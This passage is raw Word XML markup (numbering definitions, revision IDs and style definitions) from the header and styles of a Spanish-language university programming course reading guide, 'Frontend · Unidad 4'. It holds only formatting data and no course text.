    </w:pPr>
    <w:r w:rsidRPr="00A771ED">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="es-AR"/>
      </w:rPr>
      <w:t>TECNICATURA UNIVERSITARIA EN PROGRAMACIÓN</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="48A2F035" w14:textId="77777777" w:rsidR="00435B2E" w:rsidRPr="00A771ED" w:rsidRDefault="004F17FF">
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:rPr>
        <w:lang w:val="es-AR"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="595959"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
        <w:lang w:val="es-AR"/>
      </w:rPr>
      <w:t>Frontend · Unidad 4 — GUÍA DE LECTURA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5CF4D" w14:textId="77777777" w:rsidR="00062DAF" w:rsidRDefault="00062D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9C1196"/>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BF245778"/>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394C160"/>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A5EAA5C0"/>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8D891E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B43E06"/>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7328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A0FEC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24D12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7BC0F13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317938"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B8AE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A5744E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="343417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14B70E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07A47F3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2167252B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CBAEE40"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="232F0D0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3FC57D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2B3F3C44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A920414"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="324B35B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57B65DF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6E247C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="325EA9EE"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3F833462"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AA2E16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467421DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5B2BE1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885516C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDD6149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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4ACF23BB"/>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AF0178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BAF4DB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEA8673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5074281"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AA2E1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5599128F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B6A6D4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C171BF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABCE977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5D97263A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AA2E1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5E901270"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1412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60480"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409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07F3FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFE847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64276A01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFB2DE68"/>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32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66046285"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C340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3E245D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8890618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73AD7F61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFE847E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95541462">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1266232786">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1937131413">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="996882267">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="726225424">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="863178642">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1129083186">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1852335626">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1871410629">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1941523731">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1504858365">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1398014969">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="54353291">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="991372850">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="820848883">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1785033799">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="680857603">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="914096966">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="731731128">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="203179930">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1647051426">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1135368350">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1935477144">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2037268465">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="700939835">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1485580452">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="25444572">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="556281575">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="405036343">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="170721431">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1416585551">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="101078136">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="416289278">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1497694557">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="2102094453">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="536772553">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1227257572">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="110456970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B2E"/>
    <w:rsid w:val="0000351B"/>
    <w:rsid w:val="00010D4B"/>
    <w:rsid w:val="000254CB"/>
    <w:rsid w:val="00026750"/>
    <w:rsid w:val="00027486"/>
    <w:rsid w:val="00054388"/>
    <w:rsid w:val="000563FD"/>
    <w:rsid w:val="00062DAF"/>
    <w:rsid w:val="00063103"/>
    <w:rsid w:val="00070121"/>
    <w:rsid w:val="000A5A7F"/>
    <w:rsid w:val="000B0B3A"/>
    <w:rsid w:val="000D3402"/>
    <w:rsid w:val="000E2FFA"/>
    <w:rsid w:val="00143D74"/>
    <w:rsid w:val="001629F5"/>
    <w:rsid w:val="00184D35"/>
    <w:rsid w:val="001C5C28"/>
    <w:rsid w:val="001E0E3C"/>
    <w:rsid w:val="0023212D"/>
    <w:rsid w:val="00241442"/>
    <w:rsid w:val="00247149"/>
    <w:rsid w:val="0026254D"/>
    <w:rsid w:val="00277132"/>
    <w:rsid w:val="00281BC7"/>
    <w:rsid w:val="00296BD0"/>
    <w:rsid w:val="002C2699"/>
    <w:rsid w:val="002C6445"/>
    <w:rsid w:val="002E2B01"/>
    <w:rsid w:val="00312D5E"/>
    <w:rsid w:val="00346AC7"/>
    <w:rsid w:val="00347755"/>
    <w:rsid w:val="00365488"/>
    <w:rsid w:val="00367B77"/>
    <w:rsid w:val="004030BD"/>
    <w:rsid w:val="00435B2E"/>
    <w:rsid w:val="004512B1"/>
    <w:rsid w:val="00454EEE"/>
    <w:rsid w:val="00482DFA"/>
    <w:rsid w:val="00486207"/>
    <w:rsid w:val="004B5F47"/>
    <w:rsid w:val="004D0DE5"/>
    <w:rsid w:val="004F17FF"/>
    <w:rsid w:val="004F218C"/>
    <w:rsid w:val="00574F04"/>
    <w:rsid w:val="005868FF"/>
    <w:rsid w:val="005C026C"/>
    <w:rsid w:val="005E3B07"/>
    <w:rsid w:val="00603E27"/>
    <w:rsid w:val="0062145C"/>
    <w:rsid w:val="006242F5"/>
    <w:rsid w:val="00641284"/>
    <w:rsid w:val="0065438D"/>
    <w:rsid w:val="00661706"/>
    <w:rsid w:val="006B78F0"/>
    <w:rsid w:val="006D01BD"/>
    <w:rsid w:val="006F5FA1"/>
    <w:rsid w:val="00722469"/>
    <w:rsid w:val="007277CA"/>
    <w:rsid w:val="00747FC5"/>
    <w:rsid w:val="00757974"/>
    <w:rsid w:val="007A209E"/>
    <w:rsid w:val="007B031A"/>
    <w:rsid w:val="007D5E0A"/>
    <w:rsid w:val="007E22B1"/>
    <w:rsid w:val="007E3DE0"/>
    <w:rsid w:val="007F62F3"/>
    <w:rsid w:val="00845AE4"/>
    <w:rsid w:val="00887656"/>
    <w:rsid w:val="008A5540"/>
    <w:rsid w:val="008B6BDA"/>
    <w:rsid w:val="008F0E86"/>
    <w:rsid w:val="009212F8"/>
    <w:rsid w:val="009361A5"/>
    <w:rsid w:val="0093761B"/>
    <w:rsid w:val="00943522"/>
    <w:rsid w:val="0098765D"/>
    <w:rsid w:val="009946E4"/>
    <w:rsid w:val="00A672B7"/>
    <w:rsid w:val="00A76469"/>
    <w:rsid w:val="00A771ED"/>
    <w:rsid w:val="00A85D86"/>
    <w:rsid w:val="00AA0F24"/>
    <w:rsid w:val="00AA5C15"/>
    <w:rsid w:val="00AB3175"/>
    <w:rsid w:val="00AE291B"/>
    <w:rsid w:val="00B23453"/>
    <w:rsid w:val="00B5191D"/>
    <w:rsid w:val="00B565E9"/>
    <w:rsid w:val="00B74521"/>
    <w:rsid w:val="00B81FD2"/>
    <w:rsid w:val="00B859E6"/>
    <w:rsid w:val="00B94178"/>
    <w:rsid w:val="00B9782B"/>
    <w:rsid w:val="00BD0368"/>
    <w:rsid w:val="00BD2D4C"/>
    <w:rsid w:val="00BD3258"/>
    <w:rsid w:val="00BE43FF"/>
    <w:rsid w:val="00BF2416"/>
    <w:rsid w:val="00C84310"/>
    <w:rsid w:val="00C92672"/>
    <w:rsid w:val="00C952E4"/>
    <w:rsid w:val="00CB0C03"/>
    <w:rsid w:val="00CF7153"/>
    <w:rsid w:val="00D0226F"/>
    <w:rsid w:val="00D25F7F"/>
    <w:rsid w:val="00D4247B"/>
    <w:rsid w:val="00D521A3"/>
    <w:rsid w:val="00D533B0"/>
    <w:rsid w:val="00D621F1"/>
    <w:rsid w:val="00D702CA"/>
    <w:rsid w:val="00D755B6"/>
    <w:rsid w:val="00D827B0"/>
    <w:rsid w:val="00D855FD"/>
    <w:rsid w:val="00DA04DE"/>
    <w:rsid w:val="00DC64A1"/>
    <w:rsid w:val="00DE39A5"/>
    <w:rsid w:val="00E024A5"/>
    <w:rsid w:val="00E11621"/>
    <w:rsid w:val="00E51F5E"/>
    <w:rsid w:val="00E5568D"/>
    <w:rsid w:val="00E75160"/>
    <w:rsid w:val="00E81D62"/>
    <w:rsid w:val="00E85096"/>
    <w:rsid w:val="00E87250"/>
    <w:rsid w:val="00EB2498"/>
    <w:rsid w:val="00EC5825"/>
    <w:rsid w:val="00EC5C40"/>
    <w:rsid w:val="00EE563A"/>
    <w:rsid w:val="00F33FD7"/>
    <w:rsid w:val="00F35726"/>
    <w:rsid w:val="00F61190"/>
    <w:rsid w:val="00F9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AAF899"/>
  <w15:docId w15:val="{D8FEFD0F-3569-4BDB-B598-D12947B3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keepNext/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="320" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:color w:val="2E74B5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="404040"/>
      <w:sz w:val="23"/>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paragraph" w:styleId="Ttulo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo7Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>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A771E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771E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A771ED"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EncabezadoCar">
    <w:name w:val="Encabezado Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Encabezado"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PiedepginaCar">
    <w:name w:val="Pie de página Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Piedepgina"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="111111">
    <w:name w:val="Outline List 2"/>
    <w:basedOn w:val="Sinlista"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1ai">
    <w:name w:val="Outline List 1"/>
    <w:basedOn w:val="Sinlista"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="AcrnimoHTML">
    <w:name w:val="HTML Acronym"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo7Car">
    <w:name w:val="Título 7 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>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A771E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771ED"/>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A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textocomentario">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextocomentarioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextocomentarioCar">
    <w:name w:val="Texto comentario Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textocomentario"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Asuntodelcomentario">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Textocomentario"/>
    <w:next w:val="Textocomentario"/>
    <w:link w:val="AsuntodelcomentarioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AsuntodelcomentarioCar">
    <w:name w:val="Asunto del comentario Car"/>
    <w:basedOn w:val="TextocomentarioCar"/>
    <w:link w:val="Asuntodelcomentario"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliografa">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cierre">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CierreCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="4320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CierreCar">
    <w:name w:val="Cierre Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Cierre"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cita">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitaCar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00A771E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771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citadestacada">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitadestacadaCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A771E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A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CitaHTML">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista2">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista3">
    <w:name w:val="List Continue 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1080"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista4">
    <w:name w:val="List Continue 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1440"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista5">
    <w:name w:val="List Continue 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1800"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Cuadrculaclara">
    <w:name w:val="Light Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="62"/>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A771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A771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A771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A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Descripcin">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DireccinHTML">
    <w:name w:val="HTML Address"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DireccinHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DireccinHTMLCar">
    <w:name w:val="Dirección HTML Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="DireccinHTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Direccinsobre">
    <w:name w:val="envelope address"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezadodelista">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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A771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A771ED"/>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A771ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EncabezadodenotaCar">
    <w:name w:val="Encabezado de nota Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Encabezadodenota"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="nfasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasisintenso">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasissutil">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fecha">
    <w:name w:val="Date"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="FechaCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FechaCar">
    <w:name w:val="Fecha Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Fecha"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Firma">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FirmaCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="4320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FirmaCar">
    <w:name w:val="Firma Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Firma"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Firmadecorreoelectrnico">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FirmadecorreoelectrnicoCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FirmadecorreoelectrnicoCar">
    <w:name w:val="Firma de correo electrónico Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Firmadecorreoelectrnico"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
